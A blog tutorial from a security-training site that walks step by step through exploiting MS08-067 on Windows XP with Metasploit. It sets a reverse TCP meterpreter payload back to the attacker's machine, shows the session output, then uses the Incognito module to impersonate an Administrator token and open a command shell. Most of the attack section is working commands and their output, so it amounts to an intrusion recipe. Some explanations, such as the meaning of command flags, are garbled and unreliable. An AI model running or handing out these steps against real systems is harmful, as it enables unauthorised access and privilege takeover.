Metasploit: Incognito Attack

July 14, 2015 | Views: 6347

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hi there,

This is Metasploit part 1. In a recent article, we learned about the basics and a little bit of configuration. Here, we’ll be a little more advanced.

Meterpreter

What’s meterpreter? Meterpreter is a DLL injector, mostly used to hijack windows security.  A list of commands can let us overtake security of Windows and make changes to/access it.

Points to note:

  • Meterpreter works with TLS
  • Meterpreter can edit Windows features/events/scripts/shell , e.g
  • Meterpreter can us Listener to receive logs/events about victim as backdoor etc

Incognito Attack

As you might imagine, this attack vector hits anonymously (it leaves no signs of itself) and can be used to steal a session.

Useful information: Windows login / administrator rights – let’s assume we have Windows XP service pack 2 installed here. We’re on the same LAN or we have the IP (in recent article we learned about how to start msfcli / msfconsole / metasploit). Let’s assume you’ve now opened that. Set the target by typing RHOST and search the exploit named “ms08_067_netapi“. For using exploits, we know we need to type:

use exploit (full path can be found by typing search)

Next, type:

		msf> use exploit/windows/smb/ms08_067_netapi

It will show you that you’re using this exploit:

		msf exploit(ms08_067_netapi) >

Now, you need to see the options and set RHOST, or the configuration we talked about in a recent article:

	msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx

It will become:

	RHOST => xx.xx.xx.xx ( this means our RHOST is setuped )

 

Let’s Use Payloads

Payloads: Payloads are additional scripts that stand-alone and work with a sequence to take over the victim.

Buit-in has its own default payloads. We can even use out own.

Using payloads, let’s use meterpreter reverse TCP:

	msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Hit enter and this will appear, meaning your exploit is set up, too:

	PAYLOAD => windows/meterpreter/reverse_tcp

Next, set up LHOST (local host for using payloads and creating sessions for attack. Of course, we’re LHOST and we will give our IP)

	msf exploit(ms08_067_netapi) > set LHOST xx.xx.xx.xx
	LHOST = > xx.xx.xx.xx

The configurations are complete; let’s see the targets/options and what we can do further:

msf exploit(ms08_067_netapi) > show targets
Exploit targets:
	   Id  Name                                 
	   --  ----                    
	   0   Automatic Targeting                           
	   1   Windows 2000 Universal                       
	   2   Windows XP SP0/SP1 Universal
	   3   Windows XP SP2 English (NX)
	   4   Windows XP SP3 English (NX)
	   5   Windows 2003 SP0 Universal 
	   6   Windows 2003 SP1 English (NO NX)
	   7   Windows 2003 SP1 English (NX)
	   8   Windows 2003 SP2 English (NO NX)
	   9   Windows 2003 SP2 English (NX)
	   10  Windows XP SP2 Arabic (NX)
	   11  Windows XP SP2 Chinese - Traditional / Taiwan (NX)

 

We have to choose the kind of OS we need to exploit/attack. We can use NMAP / ZENMAP to learn that information:

      msf exploit(ms08_067_netapi) > set TARGET 8
	target => 8

Let’s exploit:

	msf exploit(ms08_067_netapi) > exploit

		[*] Handler binding to LHOST 0.0.0.0
		[*] Started reverse handler
		[*] Triggering the vulnerability...
		[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
		[*] Sending stage (2650 bytes)
		[*] Sleeping before handling stage...
		[*] Uploading DLL (75787 bytes)...
		[*] Upload completed.
		[*] Meterpreter session 1 opened (xx.xx.xx.xx:xx -> xx.xx.xx.xx:xx)

		meterpreter >

Choose incognito

		meterpreter > use incognito

See more options for what we can do in incognito using help:

		meterpreter > help

		Command              Description                                             
		-------              -----------                                             
		add_group_user       Attempt to add a user to a global group with all tokens 
		add_localgroup_user  Attempt to add a user to a local group with all tokens  
		add_user             Attempt to add a user with all tokens                   
		impersonate_token    Impersonate specified token                             
		list_tokens          List tokens available under current user context        
		snarf_hashes         -----------

We have to see session/tokens to access our victim. To list those tokens, type:

		meterpreter > list_token -u

		Delegation Tokens Available
		========================================
		NT AUTHORITYLOCAL SERVICE
		NT AUTHORITYNETWORK SERVICE
		NT AUTHORITYSYSTEM
		ThinkerAdministrator

		Impersonation Tokens Available
		========================================
		NT AUTHORITYANONYMOUS LOGON

 

We got the administrator listed. Let’s dump it. For dumping, we need to type command with our Victim Target name using slashes:

		
		meterpreter >  impersonate_token  Thinker//Administrator
		[+] Delegation token available
		[+] Successfully impersonated user ThinkerAdministrator
		
		let see what we got here, 
		meterpreter > getuid
		Server username: ThinkerAdministrator

 

The last step: we need to start Windows cmd. For that, type “execute -f cmd.exe -i -t
where -f is forcing meterpreter to use cmd, where -i is listing victims and -t is impersonating from it.

With shell, we can exploit meterpreter and have full access:

		meterpreter > shell 
		Process 2804 created.
		Channel 1 created.
		Microsoft Windows XP [Version 5.1.2600]
		(C) Copyright 1985-2001 Microsoft Corp.

		C:WINDOWSsystem32> whoami
		whoami
		Thinkeradministrator

		C:WINDOWSsystem32>

 

Voila! We’re now in the Windows system and have full access of it.
–Multi Thinker

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
7 Comments
  1. Good article, i have learned about Incognito some weeks ago, this helped to improve my skills, thanks

  2. MS08_O67 DOES NOT WORK FOR WIN 7 8 AND 10.. YOU HAVE TO USE APPLICATION BASED OR NETWORK BASED EXPLOITS
    #LOVESK8

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel